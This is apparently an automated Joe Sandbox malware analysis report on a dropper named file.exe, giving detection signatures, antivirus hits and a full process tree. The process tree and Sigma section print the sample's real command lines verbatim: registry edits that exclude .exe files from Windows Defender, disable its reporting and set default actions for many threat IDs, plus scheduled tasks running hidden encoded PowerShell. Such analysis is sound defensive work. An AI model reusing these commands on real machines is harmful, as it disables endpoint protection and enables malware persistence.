Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:776315
MD5:4a0ace7e59a840307eafe3c5975a7638
SHA1:5677a49aa5125af2bf2ce60dc9f304a106b462c1
SHA256:d6c028269bdbe895a6215ed9ba31b1e1fb674d1fb1edb713c133402c0c55fabf
Tags:exe
Infos:

Detection

Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: Schedule system process
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Uses cmd line tools excessively to alter registry or file data
Encrypted powershell cmdline option found
Very long command line found
Suspicious powershell command line found
Modifies Group Policy settings
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Too many similar processes found
Creates job files (autostart)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Contains capabilities to detect virtual machines
Uses reg.exe to modify the Windows registry
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 5188 cmdline: C:\Users\user\Desktop\file.exe MD5: 4A0ACE7E59A840307EAFE3C5975A7638)
    • Install.exe (PID: 3376 cmdline: .\Install.exe MD5: ACF9F750C53A4655AF0F2C792DC05166)
      • Install.exe (PID: 2772 cmdline: .\Install.exe /S /site_id "525403" MD5: C58B38377096B7C07958599E0E0C361A)
        • forfiles.exe (PID: 3536 cmdline: C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64& MD5: 4329CB18F8F74CC8DDE2C858BB80E5D8)
          • conhost.exe (PID: 3508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 2532 cmdline: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64& MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • reg.exe (PID: 4904 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
            • reg.exe (PID: 4136 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
        • forfiles.exe (PID: 1128 cmdline: C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64& MD5: 4329CB18F8F74CC8DDE2C858BB80E5D8)
          • conhost.exe (PID: 5968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 5008 cmdline: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64& MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • reg.exe (PID: 6076 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
            • reg.exe (PID: 5128 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
        • schtasks.exe (PID: 6052 cmdline: schtasks /CREATE /TN "goSRLihgj" /SC once /ST 00:45:25 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==" MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 5096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 2692 cmdline: schtasks /run /I /tn "goSRLihgj" MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 2108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 3216 cmdline: schtasks /DELETE /F /TN "goSRLihgj" MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 2160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 3004 cmdline: schtasks /CREATE /TN "bbrwVHWbINAVAbZleQ" /SC once /ST 16:12:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exe\" UB /site_id 525403 /S" /V1 /F MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 6076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • powershell.exe (PID: 4040 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA== MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 5208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • gpupdate.exe (PID: 5444 cmdline: "C:\Windows\system32\gpupdate.exe" /force MD5: 47C68FE26B0188CDD80F744F7405FF26)
      • conhost.exe (PID: 1272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • KZDOWch.exe (PID: 6068 cmdline: C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exe UB /site_id 525403 /S MD5: C58B38377096B7C07958599E0E0C361A)
    • powershell.exe (PID: 1328 cmdline: powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;" MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 3112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • gpscript.exe (PID: 4924 cmdline: gpscript.exe /RefreshSystemParam MD5: C48CBDC676E442BAF58920C5B7E556DE)
      • cmd.exe (PID: 1252 cmdline: "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32 MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • reg.exe (PID: 4852 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 496 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5884 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 2904 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 2108 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 4924 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 4188 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 4696 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 3700 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5136 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 6048 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5064 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 2220 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 4848 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 3620 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 572 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5060 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5480 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5584 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5636 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5660 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Persistence and Installation Behavior

barindex
Sigma detected: Schedule system process
Source: Process startedAuthor: Joe Security: Data: Command: schtasks /CREATE /TN "goSRLihgj" /SC once /ST 00:45:25 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==", CommandLine: schtasks /CREATE /TN "goSRLihgj" /SC once /ST 00:45:25 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==", CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: .\Install.exe /S /site_id "525403", ParentImage: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exe, ParentProcessId: 2772, ParentProcessName: Install.exe, ProcessCommandLine: schtasks /CREATE /TN "goSRLihgj" /SC once /ST 00:45:25 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==", ProcessId: 6052, ProcessName: schtasks.exe

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exeAvira: detection malicious, Label: HEUR/AGEN.1250601
Source: C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exeAvira: detection malicious, Label: HEUR/AGEN.1250601
Source: C:\Windows\Temp\CTQYLaFGBwgBLVnC\XOWTqVpevqJTLBZ\YLNoErO.exeAvira: detection malicious, Label: HEUR/AGEN.1250601
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exeReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exeReversingLabs: Detection: 65%
Source: C:\Windows\Temp\CTQYLaFGBwgBLVnC\XOWTqVpevqJTLBZ\YLNoErO.exeReversingLabs: Detection: 65%
Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040553A FindFirstFileA,0_2_0040553A
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004055DE __EH_prolog,FindFirstFileW,AreFileApisANSI,FindFirstFileA,0_2_004055DE
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\7zS7660.tmp\Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\7zS7660.tmp\__data__\Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Jump to behavior
Source: powershell.exe, 00000011.00000002.421328479.000002036A385000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000011.00000002.363453678.0000020350765000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
Source: powershell.exe, 00000011.00000002.418333366.0000020362523000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.416535432.00000203623EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000011.00000002.370748414.0000020352583000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000011.00000002.364982026.0000020352381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.431937446.0000000003E01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000011.00000002.370748414.0000020352583000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000011.00000002.416535432.00000203623EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000011.00000002.416535432.00000203623EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000011.00000002.416535432.00000203623EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000011.00000002.370748414.0000020352583000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000011.00000002.418333366.0000020362523000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.416535432.00000203623EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: file.exe, 00000000.00000002.491588777.00000000006B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: reg.exeProcess created: 49

System Summary

barindex
Very long command line found
Source: C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exeProcess created: Commandline size = 3260
Source: C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exeProcess created: Commandline size = 3260Jump to behavior
Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exeFile deleted: C:\Windows\SysWOW64\GroupPolicyMgeaNJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exeFile created: C:\Windows\system32\GroupPolicy\gpt.iniJump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004162A60_2_004162A6
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040E5A50_2_0040E5A5
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004126B00_2_004126B0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00403A010_2_00403A01
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00418EF10_2_00418EF1
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00418FCB0_2_00418FCB
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_03C1E2A024_2_03C1E2A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_03C1C7A024_2_03C1C7A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_06F1876024_2_06F18760
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_06F1001D24_2_06F1001D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_06F1876024_2_06F18760
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_06F1004024_2_06F10040
Source: C:\Users\user\Desktop\file.exeCode function: String function: 00403A9C appears 33 times
Source: C:\Users\user\Desktop\file.exeCode function: String function: 00413954 appears 179 times
Source: file.exe, 00000000.00000000.297408381.0000000000427000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename7zS.sfx.exe, vs file.exe
Source: file.exeBinary or memory string: OriginalFilename7zS.sfx.exe, vs file.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exe F78888154E211E2398FDD45D36D381E411B413EF5314D8D44D59A55C40EF23BD
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exe F78888154E211E2398FDD45D36D381E411B413EF5314D8D44D59A55C40EF23BD
Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS7660.tmp\Install.exe .\Install.exe
Source: C:\Users\user\AppData\Local\Temp\7zS7660.tmp\Install.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exe .\Install.exe /S /site_id "525403"
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&
